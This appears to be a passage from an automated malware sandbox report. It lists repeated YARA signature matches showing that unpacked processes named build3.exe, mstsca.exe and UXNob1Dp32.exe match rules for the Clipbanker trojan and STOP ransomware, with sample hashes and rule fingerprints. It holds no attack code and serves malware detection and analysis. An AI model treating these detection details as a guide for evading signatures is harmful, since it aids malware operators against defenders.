Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 14.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 14.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 29.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 29.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 20.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 20.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 27.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 27.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 11.2.build3.exe.8115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 11.2.build3.exe.8115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 27.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 27.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 31.2.mstsca.exe.9315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 31.2.mstsca.exe.9315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 11.2.build3.exe.8115a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 11.2.build3.exe.8115a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 26.2.mstsca.exe.23115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 26.2.mstsca.exe.23115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 30.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 30.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 30.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 30.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 32.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 32.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 32.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 32.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 29.2.mstsca.exe.9715a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 29.2.mstsca.exe.9715a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 20.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 20.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 17.2.mstsca.exe.9715a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 17.2.mstsca.exe.9715a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 24.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 24.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 26.2.mstsca.exe.23115a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 26.2.mstsca.exe.23115a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 14.2.build3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 14.2.build3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 10.2.UXNob1Dp32.exe.5db15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 10.2.UXNob1Dp32.exe.5db15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 31.2.mstsca.exe.9315a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 31.2.mstsca.exe.9315a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 17.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 17.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 5.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 24.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 24.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 12.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 23.2.UXNob1Dp32.exe.5de15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 23.2.UXNob1Dp32.exe.5de15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 4.2.UXNob1Dp32.exe.5dc15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 4.2.UXNob1Dp32.exe.5dc15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 23.2.UXNob1Dp32.exe.5de15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
